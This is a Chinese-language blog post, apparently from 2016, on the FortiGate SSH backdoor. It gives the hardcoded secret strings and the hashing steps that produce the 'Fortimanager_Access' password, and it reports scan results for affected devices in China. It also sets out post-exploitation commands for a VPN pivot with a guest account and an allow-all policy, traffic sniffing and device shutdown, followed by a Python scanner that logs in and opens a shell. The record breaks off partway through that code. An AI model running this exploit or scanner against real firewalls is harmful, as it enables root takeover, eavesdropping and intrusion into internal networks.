{"id":159,"date":"2016-01-15T09:24:14","date_gmt":"2016-01-15T09:24:14","guid":{"rendered":""},"modified":"2016-01-15T09:24:14","modified_gmt":"2016-01-15T09:24:14","slug":"","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=159","title":{"rendered":"\u98de\u5854(FortiGate)SSH\u540e\u95e8\u5168\u7f51\u68c0\u6d4b"},"content":{"rendered":"
<p> <b><span style="font-family:\u5b8b\u4f53;font-size:12pt;">\u6f0f\u6d1e\u6982\u8981<\/span><\/b><b><span style="font-size:12pt;"><\/span><\/b> <\/p>\n<p>\n\t    FortiiGate\u7f51\u7edc\u5b89\u5168\u5e73\u53f0\u662f\u7531Fortinet\uff08\u98de\u5854\uff09\u516c\u53f8\u63a8\u51fa\u7684\u7f51\u7edc\u9632\u706b\u5899\u4ea7\u54c1\uff0c\u5305\u62ec\u9ad8\u6027\u80fd\u6570\u636e\u4e2d\u5fc3\u9632\u706b\u5899\u548cNGFW\uff08\u4e0b\u4e00\u4ee3\u9632\u706b\u5899\uff09\u4ee5\u53caUTM\uff08 \u7edf\u4e00\u5a01\u80c1\u7ba1\u7406\uff09\u3002\u8fd9\u6b21\u66b4\u51fa\u6765\u7684\u662f\u4e00\u4e2assh\u540e\u95e8\uff0c\u653b\u51fb\u8005\u80fd\u5229\u7528\u6b64\u540e\u95e8\u76f4\u63a5\u83b7\u53d6Fortigate\u6700\u9ad8\u7ba1\u7406\u6743\u9650\uff0c\u53ef\u4ee5\u63a7\u5236\u8bbe\u5907\u8fdb\u884c\u6bd4\u5982\u6293\u53d6\u6d41\u91cf\u76d1\u542c\uff0cdns\u6b3a\u9a97\uff0c\u5efa\u7acb\u96a7\u9053\u8fdb\u5165\u4f01\u4e1a\u5185\u7f51\u7b49\u653b\u51fb\u884c\u4e3a\u3002\n<\/p>\n<p>\n\t \n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;background:white;color:black;font-size:12pt;">\u5f71\u54cd\u8303\u56f4<span><\/span><\/span><\/b>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">FortiOS 4.3.0-4.3.16 <\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u3000\u3000<span><\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">FortiOS 5.0.0-5.0.7<\/span>\n<\/p>\n<p class="MsoNormal">\n\t \n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;">\u6f0f\u6d1e\u5206\u6790<span><\/span><\/span><\/b>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>     <\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u8fd9\u4e2a\u540e\u95e8\u91c7\u7528\u4e86\u8d28\u7591<span>\/<\/span>\u5e94\u7b54\u8eab\u4efd\u8ba4\u8bc1\u6a21\u5f0f\uff1a<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:39pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>1\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5ba2\u6237\u7aef\u5411\u670d\u52a1\u5668\u53d1\u9001\u4e00\u4e2a\u9a8c\u8bc1\u8bf7\u6c42\uff0c\u5982\uff1a<span><span><span>ssh Fortimanager_Access@<\/span><\/span><\/span><\/a><\/span><span><\/span><span><\/span><span><span> <\/span><\/span><span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">1.1.1.1<\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:39pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>2\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u670d\u52a1\u5668\u63a5\u5230\u6b64\u8bf7\u6c42\u540e\u751f\u6210\u4e00\u4e2a\u968f\u673a\u6570\u4f20\u8f93\u7ed9\u5ba2\u6237\u7aef\uff08\u6b64\u4e3a\u8d28\u7591\uff09\u3002<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:39pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>3\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5ba2\u6237\u7aef\u5c06\u63a5\u6536\u5230\u7684\u968f\u673a\u6570\u5f53\u5bc6\u94a5\u7ed3\u5408\u81ea\u5df1\u6240\u6301\u7684\u5b57\u7b26\u4e32\u8ba1\u7b97\u5c31\u80fd\u5f97\u5230\u5bc6\u7801\uff08\u6b64\u4e3a\u5e94\u7b54\uff09\u3002<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:39pt;" class="MsoListParagraph">\n\t \n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;">POC<\/span><\/b><b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;">\u6d41\u7a0b\u5206\u6790<span><\/span><\/span><\/b>\n<\/p>\n<p style="text-indent:18pt;" class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u8be5\u8bbe\u5907\u7684<span>SSH<\/span>\u767b\u9646\u65b9\u5f0f\u91c7\u7528\u4ea4\u4e92\u5f0f\u9a8c\u8bc1\uff0c<span>POC<\/span>\u6d41\u7a0b\u5206\u89e3\u5982\u4e0b\uff1a<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>1\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5ba2\u6237\u7aef\u53d1\u8d77<span>ssh<\/span>\u8fde\u63a5\u8bf7\u6c42\u3002<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>2\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u670d\u52a1\u7aef\u8fd4\u56de\u4e00\u4e2a\u968f\u673a\u5b57\u7b26\u4e32\u3002<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>3\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5ba2\u6237\u7aef\u83b7\u53d6\u8fd9\u4e2a\u968f\u673a\u5b57\u7b26\u4e32\u540e\u7ed3\u5408\u672c\u5730\u6240\u6301\u6709\u7684\u5b57\u7b26\u4e32\u683c\u5f0f\u5316\u4e3a\u65b0\u4e32\uff1a<span><\/span><\/span>\n<\/p>\n<p style="text-indent:15pt;margin-left:21pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">12<\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5b57\u8282\u7684<span>\\x00<\/span>\u5b57\u7b26<span>+<\/span>\u968f\u673a\u5b57\u7b26\u4e32<span>+’FGTAbc11*xy+Qqz27’+<\/span><\/span><span> <\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">‘\\xA3\\x88\\xBA\\x2E\\x42\\x4C\\xB0\\x4A\\x53\\x79\\x30\\xC1\\x31\\x07\\xCC\\x3F\\xA1\\x32\\x90\\x29\\xA9\\x81\\x5B\\x70’<\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>4\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u4f7f\u7528<span>SHA1<\/span>\u7b97\u6cd5\u8ba1\u7b97\u4e0a\u8ff0\u5b57\u7b26\u4e32\u7684\u6458\u8981\uff0c\u8bb0\u4f5c<span>digest.<\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>5\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5728<span>digest<\/span>\u5b57\u7b26\u4e32\u524d\u6dfb\u52a0<span>12<\/span>\u5b57\u8282\u7684<span>\\x00<\/span>\u5b57\u7b26\u540e\u8fdb\u884c<span>base64<\/span>\u7f16\u7801\u3002<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>6\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5728\u7f16\u7801\u540e\u7684\u5b57\u7b26\u4e32\u524d\u6dfb\u52a0<span>\u2019AK1\u2019<\/span>\u5b57\u7b26\u3002<span><\/span><\/span>\n<\/p>\n<p style="text-indent:-18pt;margin-left:36pt;" class="MsoListParagraph">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><span>7\u3001<span>  <\/span><\/span><\/span><span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u6700\u540e\u6240\u5f97\u5b57\u7b26\u4e32\u4e3a\u5bc6\u7801\u3002<span><\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;"><\/span><\/b> \n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;">\u6f0f\u6d1e\u9a8c\u8bc1<span><\/span><\/span><\/b>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u8d28\u7591\uff1a<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><a id="ematt:345" href="http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg" target="_blank"><img title="\u70b9\u51fb\u67e5\u770b\u539f\u56fe" border="0" alt="1.jpg" src="http:\/\/www.weizn.net\/content\/uploadfile\/201601\/f3cc1452850149.jpg" width="538" height="99" \/><\/a><span><\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span><\/span><b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;"><\/span><\/b>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;">\u5e94\u7b54\uff1a<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:9pt;"><a id="ematt:347" href="http:\/\/www.weizn.net\/content\/uploadfile\/201601\/15601452850149.jpg" target="_blank"><img title="\u70b9\u51fb\u67e5\u770b\u539f\u56fe" border="0" alt="2.jpg" src="http:\/\/www.weizn.net\/content\/uploadfile\/201601\/15601452850149.jpg" width="451" height="61" \/><\/a><span><\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t\u56fd\u5185\u5171\u68c0\u6d4b\u51fa\u53d7\u5f71\u54cd\u7684\u8bbe\u5907\uff1a\n<\/p>\n<p><a id="ematt:349" href="http:\/\/www.weizn.net\/content\/uploadfile\/201601\/85ec1453168230.jpg" target="_blank"><img title="\u70b9\u51fb\u67e5\u770b\u539f\u56fe" border="0" alt="results.jpg" src="http:\/\/www.weizn.net\/content\/uploadfile\/201601\/85ec1453168230.jpg" width="395" height="51" \/><\/a> <\/p>\n<p class="MsoNormal">\n\t \n<\/p>\n<p>\n\t<span style="font-size:16px;"><strong>\u6f0f\u6d1e\u5229\u7528<\/strong><\/span><br \/>\n \u8fd9\u4e2a\u6f0f\u6d1e\u53ef\u4ee5\u83b7\u53d6\u5230\u9632\u706b\u5899\u7684root\u6743\u9650\uff0c\u6240\u6709\u9632\u706b\u5899\u7684\u64cd\u4f5c\u90fd\u53ef\u4ee5\u505a\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u521b\u5efaVPN\u7684\u65b9\u5f0f\u7ee7\u7eed\u8fdb\u884c\u5185\u7f51\u6e17\u900f\uff0c\u4e5f\u53ef\u4ee5\u4f7f\u7528\u9632\u706b\u5899\u81ea\u5e26\u7684\u6293\u5305\u529f\u80fd\u76d1\u542c\u6d41\u91cf\u3002\n<\/p>\n<p>\n\t1\u3001\u67e5\u770b\u7cfb\u7edf\u72b6\u6001<br \/>\nget system status\n<\/p>\n<p>\n\t2\u3001\u521b\u5efaVPN\uff0c\u8fde\u63a5\u540e\u53ef\u7528nmap\u5bf9\u5185\u7f51\u8fdb\u884c\u626b\u63cf\u3002<br \/>\nconfig vpn pptp<br \/>\nset status enable<br \/>\nset eip 192.168.200.100<br \/>\nset sip 192.168.200.1<br \/>\nset usrgrp Guest-group<br \/>\nend<br \/>\nconfig user local<br \/>\nedit “guest”<br \/>\nset type password<br \/>\nset passwd 123456<br \/>\nnext<br \/>\nend<br \/>\nconfig user group<br \/>\nedit “Guest-group”<br \/>\nset profile “unfiltered”<br \/>\nset member “guest”<br \/>\nnext<br \/>\nend<br \/>\nconfig firewall policy<br \/>\nedit 9<br \/>\nset srcintf “wan1”<br \/>\nset dstintf “internal”<br \/>\nset srcaddr “all”<br \/>\nset dstaddr “all”<br \/>\nset action accept<br \/>\nset schedule “always”<br \/>\nset service “ANY”<br \/>\nnext<br \/>\nend\n<\/p>\n<p>\n\t3\u3001\u76d1\u542c\u6d41\u91cf<br \/>\ndiag sniffer packet any none 3 \u6355\u83b7\u6240\u6709\u63a5\u53e3\u7684\u6570\u636e\u5305\n<\/p>\n<p>\n\t3\u3001\u67e5\u770b\u5168\u5c40\u8def\u7531\u8868<br \/>\nget router info routing-table all\n<\/p>\n<p>\n\t4\u3001\u67e5\u770bDNS<br \/>\nshow system dns\n<\/p>\n<p>\n\t5\u3001\u521b\u5efa\u9759\u6001NAT<br \/>\nconfig firewall vip<br \/>\nedit “NAT_200.1.1.10”<br \/>\nset extip 200.1.1.10<br \/>\nset extintf “port1”<br \/>\nset mappedip 10.1.1.10 <br \/>\nnext<br \/>\nend\n<\/p>\n<p>\n\t6\u3001\u5173\u95ed\/\u91cd\u542f\u8bbe\u5907<br \/>\nexec shutdown <br \/>\nexec reboot \n<\/p>\n<p class="MsoNormal">\n\t<span><\/span><b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;"><\/span><\/b>\n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;"><\/span><\/b>\n<\/p>\n<p class="MsoNormal">\n\t<b><span style="font-family:\u5b8b\u4f53;color:black;font-size:12pt;">\u516c\u7f51\u626b\u63cf\u4ee3\u7801\uff1a<span><\/span><\/span><\/b>\n<\/p>\n<p> <\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import socket<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import select<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import sys<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import paramiko<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">from paramiko.py3compat import u<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import base64<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import hashlib<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import termios<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import tty<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import thread<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import time<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">import threading<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">results_fd=”<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">threadCount=0<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">scanCount=0<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">mutex=thread.allocate_lock()<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">file_mutex=thread.allocate_lock()<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">def custom_handler(title, instructions, prompt_list):<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">n = prompt_list[0][0]<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">m = hashlib.sha1()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">m.update(‘\\x00’ * 12)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">m.update(n + ‘FGTAbc11*xy+Qqz27’)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">m.update(‘\\xA3\\x88\\xBA\\x2E\\x42\\x4C\\xB0\\x4A\\x53\\x79\\x30\\xC1\\x31\\x07\\xCC\\x3F\\xA1\\x32\\x90\\x29\\xA9\\x81\\x5B\\x70’)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">h = ‘AK1’ + base64.b64encode(‘\\x00’ * 12 + m.digest())<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">return [h]<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:12px;">def scan_host(targetIP):<\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global file_mutex<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">global results_fd<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">client = paramiko.SSHClient()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">client.set_missing_host_key_policy(paramiko.AutoAddPolicy())<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">try:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">client.connect(targetIP, username=”, allow_agent=False, look_for_keys=False,timeout=5)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">except paramiko.ssh_exception.SSHException:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">#print “debug:connect error”<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">pass<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">trans = client.get_transport()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">try:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">trans.auth_password(username=’Fortimanager_Access’, password=”, event=None, fallback=True)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">except paramiko.ssh_exception.AuthenticationException:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">#print “debug:auth failed”<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">pass<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">trans.auth_interactive(username=’Fortimanager_Access’, handler=custom_handler)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">chan = client.invoke_shell()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">oldtty = termios.tcgetattr(sys.stdin)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">    <\/span><span style="font-size:12px;">try:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">tty.setraw(sys.stdin.fileno())<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">tty.setcbreak(sys.stdin.fileno())<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">chan.settimeout(0.0)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">r, w, e = select.select([chan, sys.stdin], [], [])<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">        <\/span><span style="font-size:12px;">if chan in r:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">       <\/span><span style="font-size:12px;">     <\/span><span style="font-size:12px;">try:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">x = u(chan.recv(1024))<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">if len(x) == 0:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                    <\/span><span style="font-size:12px;">sys.stdout.write(‘\\r\\n*** EOF\\r\\n’)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">sys.stdout.write(x)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">sys.stdout.flush()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">#available<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">if file_mutex.acquire():<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                    <\/span><span style="font-size:12px;">results_fd.seek(0,2)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                    <\/span><span style="font-size:12px;">results_fd.write(targetIP+”\\n”)<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                    <\/span><span style="font-size:12px;">results_fd.flush()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                    <\/span><span style="font-size:12px;">file_mutex.release()<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">            <\/span><span style="font-size:12px;">except socket.timeout:<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span style="font-size:12px;">                <\/span><span style="font-size:12px;">#print “debug:socket timeout”<\/span><\/span>\n<\/p>\n<p class="MsoNormal">\n\t<span style="font-family:\u5b8b\u4f53;color:black;font-size:6.5pt;"><span 